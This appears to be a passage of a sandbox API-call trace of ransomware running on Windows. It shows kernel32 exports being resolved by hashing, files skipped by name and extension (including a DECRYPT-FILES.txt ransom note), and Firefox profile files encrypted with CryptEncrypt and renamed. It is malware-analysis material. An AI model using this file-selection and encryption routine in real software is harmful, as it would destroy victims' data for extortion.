(lpString="DELETETIMERQUEUETIMER") returned 21 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.788] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.788] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.788] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.788] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.788] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.788] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.788] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.788] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.788] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.788] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.788] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.788] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.789] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.789] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.789] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.789] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.789] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.789] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.789] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.789] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.789] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.789] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.789] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.789] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.789] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.789] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.789] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.789] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.789] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.790] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.790] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db") returned 96 [0080.790] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.e6NbJ") returned 102 [0080.790] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cert8.db.e6NbJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cert8.db.e6nbj"), dwFlags=0x0) returned 1 [0080.790] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.791] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.791] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.791] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xce, dwReserved0=0x0, dwReserved1=0x0, cFileName="compatibility.ini", cAlternateFileName="COMPAT~1.INI")) returned 1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="DECRYPT-FILES.txt") returned -1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="autorun.inf") returned 1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="boot.ini") returned 1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="desktop.ini") returned -1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntuser.dat") returned -1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="iconcache.db") returned -1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="bootsect.bak") returned 1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="ntuser.dat.log") returned -1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="thumbs.db") returned -1 [0080.791] lstrcmpiW (lpString1="compatibility.ini", lpString2="Bootfont.bin") returned 1 [0080.791] lstrlenW (lpString="compatibility.ini") returned 17 [0080.791] lstrcmpiW (lpString1="ini", lpString2="lnk") returned -1 [0080.791] lstrcmpiW (lpString1="ini", lpString2="exe") returned 1 [0080.791] lstrcmpiW (lpString1="ini", lpString2="sys") returned -1 [0080.792] lstrcmpiW (lpString1="ini", lpString2="dll") returned 1 [0080.792] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0080.792] lstrlenW (lpString="compatibility.ini") returned 17 [0080.792] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0080.792] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" [0080.792] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.792] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=206) returned 1 [0080.792] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.792] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.792] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.792] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.792] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.794] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.794] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.794] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.795] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.795] CloseHandle (hObject=0x464) returned 1 [0080.795] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.795] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.796] CloseHandle (hObject=0x0) returned 0 [0080.796] CloseHandle (hObject=0x460) returned 1 [0080.796] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.796] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.797] GetTickCount () returned 0x114caee [0080.797] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.797] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.797] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.797] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.797] lstrlenA (lpString="kernel32.dll") returned 12 [0080.798] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.798] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.798] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.798] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.798] lstrlenA (lpString="ADDATOMA") returned 8 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.798] lstrlenA (lpString="ADDATOMW") returned 8 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.798] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.798] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.798] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.798] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.798] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.798] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.798] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.798] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.798] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.798] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.799] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.799] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.799] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.799] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.799] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.799] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.799] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.799] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.799] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.799] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.799] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.799] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.799] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.799] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.799] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.799] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.799] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.799] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.800] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.800] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.800] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.800] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.800] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.800] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.800] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.800] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.800] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.800] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.800] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.800] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.800] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.800] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.800] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.800] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.800] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.800] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.801] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.801] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.801] lstrlenA 